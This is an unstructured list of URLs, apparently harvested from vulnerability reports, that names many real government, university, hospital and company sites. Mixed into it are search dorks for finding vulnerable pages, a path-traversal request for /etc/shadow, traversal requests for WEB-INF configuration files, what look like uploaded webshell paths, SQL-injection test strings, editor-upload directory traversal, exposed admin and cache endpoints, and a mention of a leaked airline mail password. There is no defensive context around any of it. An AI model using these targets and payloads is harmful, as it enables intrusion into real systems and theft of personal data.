http://mjob.12582.cn/my/traditionalword?type=tra&userid=1471735 http://mjob.12582.cn/my/traditionalword?type=tra&userid=1480694 http://www.wholeton.com/Anli.php https://test.bescar.com https://angelic.com.cn/ http://222.223.56.116 https://222.92.15.100 http://111.206.133.4/ http://mail.hualiu.cc/ http://www.leadbank.com.cn/ http://wechat.leadbank.com.cn/loginAction.action http://www.zc511.com/ http://www.hzyibai.com/getQuestionByProductId.do?productId=248463&curPage= http://www.nbzyyy.com/getQuestionByProductId.do?productId=250195&curPage= http://www.gxjjls.com/getQuestionByProductId.do?productId=250572&curPage= http://test.zjydyf.com/getQuestionByProductId.do?productId=130963&curPage= 
http://www.ewj2009.com/getQuestionByProductId.do?productId=246938&curPage= http://www.cnz.cn/validateCode.do http://www.cnz.cn/wooyun.jsp http://951.demo.cnz.cn/validateCode.do http://951.demo.cnz.cn/wooyun.jsp http://wolife.17wo.cn/server-info和http://wolife.17wo.cn/server-status http://wolife.17wo.cn/security/index.php http://code.it168.com/d-25428.shtml inurl:showflfg.asp?id= http://www.yn148.net/showflfg.asp?id=22 http://www.dbawx.com/showflfg.asp?id=21 http://www.keyels.com/showflfg.asp?id=29 http://www.huahailawyer.com/showflfg.asp?id=16 http://www.czxyqc.com/en1/Showflfg.asp?id=91 http://www.xiamenair.com/)官方email邮箱et@xiamenair.com密码泄漏,信件中包含很多用户敏感信息,同时还可以获取整个厦门航空公司员工姓名、email邮箱和手机号码等信息,这些信息如果用在社工上,大家可以想象一下后果。 http://**.**.**/getindex.action_ http://m.turtlebeach.com/productsDetails.action jdbc:mysql://localhost:3308/mobile_tb_cms?autoConnect=true http://click.xiu.com/sys/gotoSysUserLogin.action http://click.xiu.com/sys/loginSysUser.action demo:http://show.wecrm.com/xt/main http://down.chinaz.com/soft/29472.htm inurl:Showclient.asp?id= http://www.1518.name/ShowClient.asp?id=2525 http://www.cshlyc.com/showclient.asp?id=200 http://www.buyiju.wang/ShowClient.asp?id=2496 http://www.ahcm.cc/ShowClient.asp?id=2463 http://ohg-il.com/ShowClient.asp?id=1 http://www.ehsy.com/ http://www.rjh.com.cn/rjhsearch/Pages/Detail.aspx?yggh=J9418 http://www.rjh.com.cn/RUIJIN_Portal_ClickCount_WebSite/ClickOrder.aspx?PortalType=rjh http://www.rjh.com.cn/mzynjbapp/Expert/OfficeList.aspx?OfficeID=4160000 http://fy3.cdpc.org.cn/ http://fy3.cdpc.org.cn/PopUpWindow/ChildBirthPersonSecond.aspx?id=189 http://www.auxgroup.com/JobList.aspx?type=1 http://libweb.yuntech.edu.tw:8080/ireading/index.action http://sell.2.taobao.com/ http://down.chinaz.com/soft/29472.htm http://www.laco-hr.com/showdxal.asp?id=66 http://www.pundun.cn/showdxal.asp?id=66 http://www.szcxl.com/showdxal.asp?id=63 http://www.jshbls.com/showdxal.asp?id=19 http://www.xmpangu.com/showdxal.asp?id=74 
http://223.202.6.25:8080/是接入系统链接。 parameters:shopId http://www.ewj2009.com/getShopMessage.do?shopId=481 http://www.jhtht.com/getShopMessage.do?shopId=301 http://www.smdyf.cn/getShopMessage.do?shopId=124 http://www.zjrrt.com/getShopMessage.do?shopId=648 http://test.9nihao.com/getShopMessage.do?shopId=261 http://admin.601601.com/login http://www.zc511.com/showIndex.do Data:shopName=%E5%BA%97&curPage=1&pageSize=5&province=0&city=0&district=0 Parameter:shopName www.****.com http://www.****.com http://activity.tudou.com/javax.faces.resource.../WEB-INF/web.xml.jsf http://activity.tudou.com/javax.faces.resource.../WEB-INF/classes/spring/spring-servlet.xml.jsf http://activity.tudou.com/javax.faces.resource.../WEB-INF/classes/spring/main.xml.jsf http://activity.tudou.com/javax.faces.resource.../WEB-INF/velocity/toolbox.xml.jsf http://www.zc511.com/showIndex.do http://www.smdyf.cn/getShopMapDetail.do?shopId=68 http://www.ewj2009.com/getShopMapDetail.do?shopId=451 http://www.jhtht.com/getShopMapDetail.do?shopId=301 http://www.zjrrt.com/getShopMapDetail.do?shopId=648 http://test.9nihao.com/getShopMapDetail.do?shopId=261 inurl:hn_news.asp?id= http://www.sxkaize.cn/hn_news.asp?id=114 http://www.sxhaoyao.com/hn_news.asp?id=361 http://www.xywcsyyey.com/web/hn_news.asp?id=582 http://www.sxhyys.com/hn_news.asp?id=377 http://www.xyrip.com/hn_news.asp?id=306 http://www.xygmjx.com/hn_news.asp?id=337 http://www.xyqinxu.com/hn_news.asp?id=330 http://www.xyhaitong.com/hn_news.asp?id=320 http://www.sxyf.cn/hn_news.asp?id=342 http://www.xywhblg.com/hn_news.asp?id=311 http://www.xyzqjzlw.com/hn_news.asp?id=275 http://app.gooooal.com/newsTree.do?keyword= http://sqlmap.org http://bbs.qule.com/uc_server/admin.php http://wap.l0086csh.com/ http://vvj10086.com/admin/login.asp http://wap.l0086csh.com/admin/login.asp http://m.ibeiliao.com/yanzhengma.php http://bbs.58wan.com//uc_server/data/config.inc.php.bak http://down.chinaz.com/soft/35447.htm http://www.edayshop.com/ inurl:sp.asp?sx= 
http://freetuan.net/admins/ http://www.epqy.cn/dgt/admins/ http://www.damagz.com/admins/ http://tuan.07551.com.cn/admins/ http://www.syftmy.com/tuan/admins/ http://地址/org_execl_download.action?filename=../../../../../../etc/shadow http://218.78.241.80/anmai/KY_Mamage/Others/Technic_Cession_Right.aspx?depname=a http://jmzx.xmedu.cn:9999/anmai/KY_Mamage/Others/Technic_Cession_Right.aspx?depname=a http://oa.w12z.com/anmai/KY_Mamage/Others/Technic_Cession_Right.aspx?depname=a http://www.gxbyzx.cn:88/anmai/KY_Mamage/Others/Technic_Cession_Right.aspx?depname=a http://www.xwgjzx.com:8888/anmai/KY_Mamage/Others/Technic_Cession_Right.aspx?depname=a http://szxx.pudong-edu.sh.cn/anmai/KY_Mamage/Others/Technic_Cession_Right.aspx?depname=a inurl:jcl_type.asp?id= http://www.cgjgroup.com/jcl_type.asp?id=30 http://www.sxkaize.cn/jcl_type.asp?id=45 http://www.xyrip.com/jcl_type.asp?id=30 http://www.sxhyys.com/jcl_type.asp?id=30 http://www.13xiang.cn/jcl_type.asp?id=31 http://www.hyxzfw.gov.cn/guestbook_read.asp?id=37 http://www.jmepb.gov.cn/guestbook_read.asp?id=1825 http://www.jmpic.gov.cn/guestbook_read.asp?id=22035 http://jshuaqiao.com/guestbook_read.asp?id=1736 http://202.103.11.102/guestbook_read.asp?id=21595 http://www.nonobank.com/Register http://admin.ibeiliao.com/index.php/login.in http://admin.ibeiliao.com/aquincum/messages.html http://218.78.241.80/anmai/KY_Mamage/Others/Science_Literature_Right.aspx?idcard=a http://jmzx.xmedu.cn:9999/anmai/KY_Mamage/Others/Science_Literature_Right.aspx?idcard=a http://www.gxbyzx.cn:88/anmai/KY_Mamage/Others/Science_Literature_Right.aspx?idcard=a http://oa.w12z.com/anmai/KY_Mamage/Others/Science_Literature_Right.aspx?idcard=a http://www.xwgjzx.com:8888/anmai/KY_Mamage/Others/Science_Literature_Right.aspx?idcard=a http://szxx.pudong-edu.sh.cn/anmai/KY_Mamage/Others/Science_Literature_Right.aspx?idcard=a http://www.gdyf.lss.gov.cn/ForJobDetail.aspx?ID=425 http://210.76.66.108/hyyy/ www.qqhrgaj.gov.cn:8088/News/view_video.action 
Http://36.250.159.106:5155/mhpublic.apk Http://36.250.159.106:5156/mhdoctor.apk http://*/admin Http://36.250.159.106:5155/admin http://36.250.159.106:5255/admin http://36.250.159.106:5256/admin http://36.250.159.106:9000/admin http://36.250.159.106:9000/avatars/020b2328-2960-49b9-a667-c12b357a4ac3.aspx http://修改我:端口/Admin/StaffMag/UploadStaffImg http://36.250.159.106:5155/avatars/332894e8-c643-4bd4-924a-b65658168f72.aspx http://36.250.159.106:5256/avatars/f5706c38-eed3-4cee-a656-61cef2c440c4.aspx http://36.250.159.106:5255/avatars/b1644026-56dd-4014-b5f0-640b0dceea75.aspx http://36.250.159.106:5155 http://36.250.159.106:5155/api/Staff/GetStaffList http://36.250.159.106:5255/api/Staff/GetStaffList http://36.250.159.106:5256/api/Staff/GetStaffList http://36.250.159.106:9000/api/Staff/GetStaffList http://mdyy.mh.zoesoft.net:5256/Admin/StaffMag/Index http://mdyy.mh.zoesoft.net:5256/api/Staff/GetStaffList http://mdyy.mh.zoesoft.net:5155/api/Staff/GetStaffList http://mdyy.mh.zoesoft.net:5156/api/Staff/GetStaffList http://mdyy.mh.zoesoft.net:5255/api/Staff/GetStaffList http://www.m6go.com/user/regSuc.do?UserID=734188 http://tclcomm.com http://tclcomm.com/news/news_content.asp?articleid=2452 http://tclcomm.com/news/news_content.asp?articleid=2452 http://test.nitc.cc/office/privilege.php?action=login http://gs.njfu.edu.cn/Gmis/xw/tdxlshtsh.aspx http://202.203.225.17:8080/Gmis/xw/tdxlshtsh.aspx http://218.75.27.177/Gmis/xw/tdxlshtsh.aspx http://yjsy.wmu.edu.cn:8080/Gmis/xw/tdxlshtsh.aspx http://101.76.99.20/Gmis/xw/tdxlshtsh.aspx http://61.187.179.68:8080/Gmis/xw/tdxlshtsh.aspx http://yjsy.wzmc.edu.cn:8080/Gmis/xw/tdxlshtsh.aspx http://210.43.126.80:8080/Gmis/xw/tdxlshtsh.aspx http://211.64.205.214/Gmis/xw/tdxlshtsh.aspx http://211.64.205.214/Gmis/xw/tdxlshtsh.aspx http://hao.tcl.com/examples/servlets/servlet/SessionExample http://hao.tcl.com//examples/servlets/index.html http://www.pengpengmall.com/info.php http://battery.tcl.com/read_news.php?id=1 
http://gs.njfu.edu.cn/Gmis/xw/xsfblwdj.aspx?xh=1 http://202.203.225.17:8080/Gmis/xw/xsfblwdj.aspx?xh=1 http://218.75.27.177/Gmis/xw/xsfblwdj.aspx?xh=1 http://yjsy.wmu.edu.cn:8080/Gmis/xw/xsfblwdj.aspx?xh=1 http://101.76.99.20/Gmis/xw/xsfblwdj.aspx?xh=1 http://61.187.179.68:8080/Gmis/xw/xsfblwdj.aspx?xh=1 http://yjsy.wzmc.edu.cn:8080/Gmis/xw/xsfblwdj.aspx?xh=1 http://210.43.126.80:8080/Gmis/xw/xsfblwdj.aspx?xh=1 http://211.64.205.214/Gmis/xw/xsfblwdj.aspx?xh=1 http://211.64.205.214/Gmis/xw/xsfblwdj.aspx?xh=1 http://221.237.155.48:82/ http://113.200.189.166:8080/NAS/customer/customer_login.action http://union.lashou.com/ http://union.lashou.com/index.php?r=effect/site/site&id=5444 http://gs.njfu.edu.cn/Gmis/xw/xlsyjsyxwsh.aspx http://202.203.225.17:8080/Gmis/xw/xlsyjsyxwsh.aspx http://218.75.27.177/Gmis/xw/xlsyjsyxwsh.aspx http://yjsy.wmu.edu.cn:8080/Gmis/xw/xlsyjsyxwsh.aspx http://101.76.99.20/Gmis/xw/xlsyjsyxwsh.aspx http://61.187.179.68:8080/Gmis/xw/xlsyjsyxwsh.aspx http://yjsy.wzmc.edu.cn:8080/Gmis/xw/xlsyjsyxwsh.aspx http://210.43.126.80:8080/Gmis/xw/xlsyjsyxwsh.aspx http://211.64.205.214/Gmis/xw/xlsyjsyxwsh.aspx http://210.43.126.80:8080/Gmis/xw/xlsyjsyxwsh.aspx http://202.203.225.17:8080/Gmis/xw/ktbgsh_edit1.aspx?xh=1 http://218.75.27.177/Gmis/xw/ktbgsh_edit1.aspx?xh=1 http://yjsy.wmu.edu.cn:8080/Gmis/xw/ktbgsh_edit1.aspx?xh=1 http://101.76.99.20/Gmis/xw/ktbgsh_edit1.aspx?xh=1 http://61.187.179.68:8080/Gmis/xw/ktbgsh_edit1.aspx?xh=1 http://yjsy.wzmc.edu.cn:8080/Gmis/xw/ktbgsh_edit1.aspx?xh=1 http://210.43.126.80:8080/Gmis/xw/ktbgsh_edit1.aspx?xh=1 http://218.75.27.177/Gmis/xw/ktbgsh_edit1.aspx?xh=1 http://gs.njfu.edu.cn/Gmis/xw/ktbgsh_edit.aspx?xh=1 http://202.203.225.17:8080/Gmis/xw/ktbgsh_edit.aspx?xh=1 http://218.75.27.177/Gmis/xw/ktbgsh_edit.aspx?xh=1 http://yjsy.wmu.edu.cn:8080/Gmis/xw/ktbgsh_edit.aspx?xh=1 http://101.76.99.20/Gmis/xw/ktbgsh_edit.aspx?xh=1 http://61.187.179.68:8080/Gmis/xw/ktbgsh_edit.aspx?xh=1 
http://yjsy.wzmc.edu.cn:8080/Gmis/xw/ktbgsh_edit.aspx?xh=1 http://210.43.126.80:8080/Gmis/xw/ktbgsh_edit.aspx?xh=1 http://211.64.205.214/Gmis/xw/ktbgsh_edit.aspx?xh=1 http://211.64.205.214/Gmis/xw/ktbgsh_edit.aspx?xh=1 http://gs.njfu.edu.cn/Gmis/xw/dbtljgsh.aspx?id=1 http://202.203.225.17:8080/Gmis/xw/dbtljgsh.aspx?id=1 http://218.75.27.177/Gmis/xw/dbtljgsh.aspx?id=1 http://yjsy.wmu.edu.cn:8080/Gmis/xw/dbtljgsh.aspx?id=1 http://101.76.99.20/Gmis/xw/dbtljgsh.aspx?id=1 http://61.187.179.68:8080/Gmis/xw/dbtljgsh.aspx?id=1 http://yjsy.wzmc.edu.cn:8080/Gmis/xw/dbtljgsh.aspx?id=1 http://210.43.126.80:8080/Gmis/xw/dbtljgsh.aspx?id=1 http://211.64.205.214/Gmis/xw/dbtljgsh.aspx?id=1 http://211.64.205.214/Gmis/xw/dbtljgsh.aspx?id=1 http://gs.njfu.edu.cn/ http://202.203.225.17:8080/ http://218.75.27.177/ http://yjsy.wmu.edu.cn:8080/ http://101.76.99.20/ http://61.187.179.68:8080/ http://yjsy.wzmc.edu.cn:8080/ http://210.43.126.80:8080/ http://211.64.205.214/ http://m.yoger.com.cn/class.php?classid=19&sort=%E8%B7%91%E6%AD%A5%E8%A3%85%E5%A4%87 http://m.yoger.com.cn/product_list_info.php?brand=brand&search=%E8%83%9C%E5%88%A9Victor&sort=comments_d http://m.yoger.com.cn/product_list_info.php?classid=1029&sort=comments_d&sx= http://gs.njfu.edu.cn/Gmis/xw/dbtljgxg.aspx?id=1 http://202.203.225.17:8080/Gmis/xw/dbtljgxg.aspx?id=1 http://218.75.27.177/Gmis/xw/dbtljgxg.aspx?id=1 http://yjsy.wmu.edu.cn:8080/Gmis/xw/dbtljgxg.aspx?id=1 http://101.76.99.20/Gmis/xw/dbtljgxg.aspx?id=1 http://61.187.179.68:8080/Gmis/xw/dbtljgxg.aspx?id=1 http://yjsy.wzmc.edu.cn:8080/Gmis/xw/dbtljgxg.aspx?id=1 http://210.43.126.80:8080/Gmis/xw/dbtljgxg.aspx?id=1 http://211.64.205.214/Gmis/xw/dbtljgxg.aspx?id=1 http://gs.njfu.edu.cn/Gmis/xw/dbtljgxg.aspx?id=1 http://admin.union.tudou.com/ http://218.76.120.55/ http://222.245.246.242 http://222.244.83.117 http://222.244.38.192 http://222.243.117.30/ http://222.242.28.188 http://222.242.5.32 http://222.242.1.211 http://222.241.161.38 http://222.240.106.203 
http://222.240.55.16/ http://gs.njfu.edu.cn/Gmis/xw/fwhtlxxxg.aspx http://202.203.225.17:8080/Gmis/xw/fwhtlxxxg.aspx http://218.75.27.177/Gmis/xw/fwhtlxxxg.aspx http://yjsy.wmu.edu.cn:8080/Gmis/xw/fwhtlxxxg.aspx http://101.76.99.20/Gmis/xw/fwhtlxxxg.aspx http://61.187.179.68:8080/Gmis/xw/fwhtlxxxg.aspx http://yjsy.wzmc.edu.cn:8080/Gmis/xw/fwhtlxxxg.aspx http://210.43.126.80:8080/Gmis/xw/fwhtlxxxg.aspx http://210.43.126.80:8080/Gmis/xw/fwhtlxxxg.aspx http://gs.njfu.edu.cn/Gmis/xw/fwhclcxmx.aspx?id=1 http://202.203.225.17:8080/Gmis/xw/fwhclcxmx.aspx?id=1 http://218.75.27.177/Gmis/xw/fwhclcxmx.aspx?id=1 http://yjsy.wmu.edu.cn:8080/Gmis/xw/fwhclcxmx.aspx?id=1 http://101.76.99.20/Gmis/xw/fwhclcxmx.aspx?id=1 http://61.187.179.68:8080/Gmis/xw/fwhclcxmx.aspx?id=1 http://yjsy.wzmc.edu.cn:8080/Gmis/xw/fwhclcxmx.aspx?id=1 http://210.43.126.80:8080/Gmis/xw/fwhclcxmx.aspx?id=1 http://211.64.205.214/Gmis/xw/fwhclcxmx.aspx?id=1 http://gs.njfu.edu.cn/Gmis/xw/fwhclcxmx.aspx?id=1 http://211.3.166.117/index.htm http://210.237.217.5/index.htm http://210.238.99.253/ http://210.1.212.160/index.htm http://193.169.227.11/index.htm http://121.208.2.208/index.htm http://gs.njfu.edu.cn/Gmis/xw/fwhtlgjscedit.aspx?id= http://202.203.225.17:8080/Gmis/xw/fwhtlgjscedit.aspx?id= http://218.75.27.177/Gmis/xw/fwhtlgjscedit.aspx?id= http://yjsy.wmu.edu.cn:8080/Gmis/xw/fwhtlgjscedit.aspx?id= http://101.76.99.20/Gmis/xw/fwhtlgjscedit.aspx?id= http://61.187.179.68:8080/Gmis/xw/fwhtlgjscedit.aspx?id= http://yjsy.wzmc.edu.cn:8080/Gmis/xw/fwhtlgjscedit.aspx?id= http://210.43.126.80:8080/Gmis/xw/fwhtlgjscedit.aspx?id= http://211.64.205.214/Gmis/xw/fwhtlgjscedit.aspx?id= http://211.64.205.214/Gmis/xw/fwhtlgjscedit.aspx?id= http://210.43.126.80:8080/Gmis/xw/fwhtlgjscedit.aspx?id= http://gs.njfu.edu.cn/Gmis/xw/fwhlrxxedit.aspx?id= http://202.203.225.17:8080/Gmis/xw/fwhlrxxedit.aspx?id= http://218.75.27.177/Gmis/xw/fwhlrxxedit.aspx?id= http://yjsy.wmu.edu.cn:8080/Gmis/xw/fwhlrxxedit.aspx?id= 
http://101.76.99.20/Gmis/xw/fwhlrxxedit.aspx?id= http://61.187.179.68:8080/Gmis/xw/fwhlrxxedit.aspx?id= http://yjsy.wzmc.edu.cn:8080/Gmis/xw/fwhlrxxedit.aspx?id= http://210.43.126.80:8080/Gmis/xw/fwhlrxxedit.aspx?id= http://211.64.205.214/Gmis/xw/fwhlrxxedit.aspx?id= http://211.64.205.214/Gmis/xw/fwhlrxxedit.aspx?id= http://gs.njfu.edu.cn/Gmis/xw/fwhtlclcx.aspx http://202.203.225.17:8080/Gmis/xw/fwhtlclcx.aspx http://218.75.27.177/Gmis/xw/fwhtlclcx.aspx http://yjsy.wmu.edu.cn:8080/Gmis/xw/fwhtlclcx.aspx http://101.76.99.20/Gmis/xw/fwhtlclcx.aspx http://61.187.179.68:8080/Gmis/xw/fwhtlclcx.aspx http://yjsy.wzmc.edu.cn:8080/Gmis/xw/fwhtlclcx.aspx http://210.43.126.80:8080/Gmis/xw/fwhtlclcx.aspx http://211.64.205.214/Gmis/xw/fwhtlclcx.aspx http://211.64.205.214/Gmis/xw/fwhtlclcx.aspx http://zxft.dongying.gov.cn/dyvideo/index.php?option=com_content&view=article&id=465&Itemid=84 http://oa.lib.xjtu.edu.cn/oa.do?start=1-9 http://showadmin.pipi.cn,会跳转到http://showadmin.chengxing.tv/ http://www.scti.cn/WebSiteMaintain2014/checkLogOn.do http://123.124.148.248:8888/dap/dtalent/drs/default/commonPage.jsp?innercode=007 http://123.124.148.248:8888 http://www.jenomc.com/stk/memberUnits.jsp index.php/api/testdrive_dealers http://www.gysml.cn/News/newlist.do?PrtID=1 http://www.zzzsjy.cn/News/newlist.do?PrtID=2 http://www.sysqjyw.cn/News/newlist.do?PrtID=1 http://www.xtsqedu.com/News/newlist.do?PrtID=1 http://www.ntsmxx.net/News/newlist.do?PrtID=2 http://www.ycgjw.cn/News/newlist.do?PrtID=4 http://www.zzzsjy.cn/News/newlist.do?PrtID=2 http://www.tystudy.cn/News/newlist.do?PrtID=1 http://www.yzqxxw.com/News/newlist.do?PrtID=1 http://wssp.fsxzfw.gov.cn/ http://fw.hzzk.gov.cn/ http://wsbs.xinhui.gov.cn/ http://bsdt.baoan.gov.cn/ http://www.lib.xjtu.edu.cn/bookriview.do http://www.lib.xjtu.edu.cn/news.do http://easyad.cig.com.cn/dmp/report/domaindate_zhuyuming_zi?domain=cig.com.cn&date=2012-09-30 http://www.186online.com/usermanager/login.do http://www.186online.com/usermanager/login.do 
http://gs.njfu.edu.cn/Gmis/xw/EditdbxxInfo_bs.aspx?xh=1 http://202.203.225.17:8080/Gmis/xw/EditdbxxInfo_bs.aspx?xh=1 http://218.75.27.177/Gmis/xw/EditdbxxInfo_bs.aspx?xh=1 http://yjsy.wmu.edu.cn:8080/Gmis/xw/EditdbxxInfo_bs.aspx?xh=1 http://101.76.99.20/Gmis/xw/EditdbxxInfo_bs.aspx?xh=1 http://61.187.179.68:8080/Gmis/xw/EditdbxxInfo_bs.aspx?xh=1 http://yjsy.wzmc.edu.cn:8080/Gmis/xw/EditdbxxInfo_bs.aspx?xh=1 http://210.43.126.80:8080/Gmis/xw/EditdbxxInfo_bs.aspx?xh=1 http://211.64.205.214/Gmis/xw/EditdbxxInfo_bs.aspx?xh=1 http://211.64.205.214/Gmis/xw/EditdbxxInfo_bs.aspx?xh=1 http://jpkc.wzu.edu.cn/xdjyjs/exam/admin/Login.aspx https://github.com/katogenzo/Complex/blob/master/config/site-config.xml http://guobozhaopin.chnmuseum.cn/dap/dtalent/drs/default/commonPage.jsp?innercode=007 http://guobozhaopin.chnmuseum.cn http://**.**.**/ http://**.**.**/ http://www.zjdy.gov.cn/News/List.asp?Newsid=2604 site:cig.com.cn http://www.cig.com.cn/maz/detail.aspx?nid=31 http://www.cig.com.cn/maz/list.aspx demo2:demodemo http://show.wecrm.com/xt/CompanyPlatform/GetBbsDataList/ http://show.wecrm.com www.qysi.gov.cn/websys/jsp/website/wwwserver/wwwserver.jsp?org_id=001 http://www.xiangshe.com/www.xiangshe.com.rar http://202.96.24.7/login/lg.action存在struts2漏洞 http://yy.cymy.edu.cn/ShowNotice.asp?ID=25 wsjws.gzga.gov.cn/introduce.aspxpid=782cfa78666f4a7f990b1dd26a851b01 https://github.com/DevilRock/MonitorSummary/blob/57dd4248ffbf928371eecb623e01741617fd85ce/src/com/chinacache/rock/conf/MailConfig.java http://125.69.90.148:88/index/ http://cnp.spqi.gov.cn http://cnp.spqi.gov.cn/textfile.asp?zlm=&nclassid=183 http://log.dfsk.dma.cig.com.cn/login http://log.yiqi.autodmp.cig.com.cn/login http://chana-mazda.dma.cig.com.cn/ http://log.yiqi.autodmp.cig.com.cn/account/forget_passwd http://chana-mazda.dma.cig.com.cn www.gdmm110.cn/_ http://wooyun.org/bugs/wooyun-2015-0104081/trace/b52e42dc36a6fdc701f611033860edb0 http://www.cctv.com/specials/1999spring/cj/wshk/card.txt 
http://www.hyxzfw.gov.cn/zxjb_read.asp?id=3401 http://www.gzshebao.org/zxjb_read.asp?id=2311 http://www.wyxzfw.com/zxjb_read.asp?id=3426 http://jshuaqiao.com/zxjb_read.asp?id=2384 http://60.8.102.174/zxjb_read.asp?id=1975 http://www.gorrun.cn/index.php/channel/cases/ http://sqlmap.org http://br.gzhu.edu.cn/Norm.asp?id_code=0011 http://115.28.27.119/ www.m6go.com什么关系? http://www.xiangshe.com/www.xiangshe.com.rar http://www.xxhjy.cn/Machinery/showspic.asp?id=1 http://www.chinashy.com.cn/ http://www.chinashy.com.cn/install/install.php http://gs.njfu.edu.cn/ http://202.203.225.17:8080/ http://218.75.27.177/ http://yjsy.wmu.edu.cn:8080/ http://101.76.99.20/ http://61.187.179.68:8080/ http://yjsy.wzmc.edu.cn:8080/ http://210.43.126.80:8080/ http://211.64.205.214/ http://hhb.cig.com.cn http://esp.haier.com/account/ http://esp.haier.com/archive/ http://esp.haier.com/connect/ http://esp.haier.com/demo/ http://esp.haier.com/admin/user/ http://esp.haier.com/tools/ http://esp.haier.com/upload/ http://esp.haier.com/user/ http://esp.haier.com/WebService/ http://gd.10086.cn/hcareer/society/Resume/EduInfo.aspx?id=286(id任意) http://emba.njust.edu.cn/jiaowu.asp?cid=115 http://www.xinli001.com/user/article/44441554/ https://biz.vvipone.com/v/employee/edit?id=2 http://www.twxinyang.com/shop/class/index.php?catid=0&showbrandid=0&key=a&imageField.x=33&imageField.y=9 http://www.81yy.com/disease_news.php?dis_id=1201016005 url://210.44.80.14/jiaowu/Login_xsmm.asp http://group.xinli001.com/1/44642824/ android:exported="false",若需要外部调用,需自定义signature或者signatureOrSystem级别的权限 www.bobo.com http://i.yiche.com/authenservice/AboutPassWord/RetrievePassword.aspx http://www.viewgood.com/ http://demo.viewgood.com先注册个账号 http://www.bawang.com.cn/System/ http://www.bawang.com.cn/admin/ http://www.bawang.com.cn/system/eWebEditor/admin/ http://www.bawang.com.cn/system/ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir= http://www.bawang.com.cn/system/ewebeditor/admin/upload.asp?id=&dir=/../ 
http://www.bawang.com.cn/system/ewebeditor/admin/upload.asp?id=&dir=/../../AppServ/www www.elifepay.com.cn http://www.haiertv.cn/appstoreView/newsInfo.xhtml?wmsShopAnnounce.announceId=30 http://app.scloudm.com/app/push_app_info http://xxxxxxx http://www.ztgame.com/releasexxx http://xxxxxxx http://www.ztgame.com/releasexxx http://xxxxxxx123详细介绍,测试数据测试名称com.ztgame.juren12354454222http://www.ztgame.com/releasexxxIOS更新1.0正式版,更多新功能 http://xxxxxxx123详细介绍,测试数据测试名称com.ztgame.juren12354454222http://www.ztgame.com/releasexxxIOS更新1.0正式版,更多新功能 http://app.scloudm.com/app/push_app_info?app_updtime=1414576078&category=1&cover_img=&description=%E7%AE%80%E4%BB%8B%EF%BC%8C%E6%B5%8B%E8%AF%95%E6%95%B0%E6%8D%AE&developer=%E5%B7%A8%E4%BA%BA&icon_img=http%3A%2F%2Fxxxxxxx&id=123&intro=%E8%AF%A6%E7%BB%86%E4%BB%8B%E7%BB%8D%EF%BC%8C%E6%B5%8B%E8%AF%95%E6%95%B0%E6%8D%AE&name=%E6%B5%8B%E8%AF%95%E5%90%8D%E7%A7%B0&pkg_name=com.ztgame.juren&pkg_size=12354454222&pkg_url=http%3A%2F%2Fwww.ztgame.com%2Freleasexxx&platform=IOS&screenshots=&upd_info=%E6%9B%B4%E6%96%B01.0%E6%AD%A3%E5%BC%8F%E7%89%88%EF%BC%8C%E6%9B%B4%E5%A4%9A%E6%96%B0%E5%8A%9F%E8%83%BD+%EF%BC%8C%E4%BF%AE%E5%A4%8Dbug%EF%BC%8Ciphone6Plus%E9%80%82%E9%85%8D&version=v1.0.0&sign=6e616467a1273b30ac29346466366475 http://app.scloudm.com/app/push_app_shutdown http://www.scloudm.com/aboutus.php http://60.28.217.138:11211 http://yhk.wiselong.com:8080/ccbs/ccbs/order/showOrderList.do?method=showOrderDetailJsp&orderId=912111&isStorePage=Y http://yhk.wiselong.com:8080/ccbs http://www.zc511.com/showIndex.do Parameter:productCode http://www.smdyf.cn/getProductQulificationFileAndRegisterFile.do?productCode=47970 http://www.yizheng.cc/getProductQulificationFileAndRegisterFile.do?productCode=15089 http://www.jhtht.com/getProductQulificationFileAndRegisterFile.do?productCode=1060100054 http://www.nbzyyy.com/getProductQulificationFileAndRegisterFile.do?productCode=09253 http://www.wzyst.net/getProductQulificationFileAndRegisterFile.do?productCode=30926163 
http://202.96.85.177/web/questionnaire/taxSchoolWebQuestionnaireActions!toQuestionnaire.action http://202.96.85.177/web/taxSchoolWebSecurityActions!jump.action http://localhost/KPPW/index.php?do=user&view=message&op=detail&msgId=74&type=trends&intPage=1 http://localhost/KPPW/index.php?do=user&view=message&op=detail&type=trends&intPage=1&msgId=74%26%261%3D1 http://localhost/KPPW/index.php?do=user&view=message&op=detail&type=trends&intPage=1&msgId=74%26%261%3D2 http://union.zhuna.cn/user/ajaxarea.asp?Id=6&TypeID=CityID http://cg.lashou.com/login.php?from=wap# http://fec.sicnu.edu.cn/announceDetail.aspx?announceid=69 http://fzxy.sicnu.edu.cn/Second.asp?ID=111 http://www.xtrcb.net/khyy/login.asp http://m.mindcity.sina.com.tw/gtest/question.php?id=2037 http://www.minjiao.com/ inurl:web_programs_dotnet http://www.gdaudit.gov.cn/ http://www.gdaudit.gov.cn/FCKeditor/editor/filemanager/upload/simpleuploader?Type=File jsp:root xmlns:jsp="http://java.sun.com/JSP/Page http://www.w3.org/1999/xhtml xmlns:c="http://java.sun.com/jsp/jstl/core jsp:directive.page jsp:directive.page jsp:directive.page jsp:scriptlet http://openapi.lenovomm.com/music/admin.jsp http://www.96956.com.cn/uapssoweb/login/logintv!ssoLogin?channelcode=1001&citycode=FS&returl=1 http://www.96956.com.cn/uapssoweb/login/login!ssoLogin?channelcode=1001&citycode=root&returl=1 http://www.96956.com.cn/uapssoweb/login/ http://sqlmap.org inurl:/pmember.asp http://www.dlcxdrc.com//psearch.asp?key=::%C7%EB%D1%A1%D2%EB%D6%B0%CE%BB%C0%E0%B1%F0::&gzdd=noxz&city=%B2%BB%CF%DE&data=%B2%BB%CF%DE http://www.cxdrc.com//psearch.asp?key=::%C7%EB%D1%A1%D2%EB%D6%B0%CE%BB%C0%E0%B1%F0::&gzdd=noxz&city=%B2%BB%CF%DE&data=%B2%BB%CF%DE http://www.lncyrc.com.cn//psearch.asp?key=::%C7%EB%D1%A1%D2%EB%D6%B0%CE%BB%C0%E0%B1%F0::&gzdd=noxz&city=%B2%BB%CF%DE&data=%B2%BB%CF%DE http://www.lnbprsrc.com//psearch.asp?key=::%C7%EB%D1%A1%D2%EB%D6%B0%CE%BB%C0%E0%B1%F0::&gzdd=noxz&city=%B2%BB%CF%DE&data=%B2%BB%CF%DE 
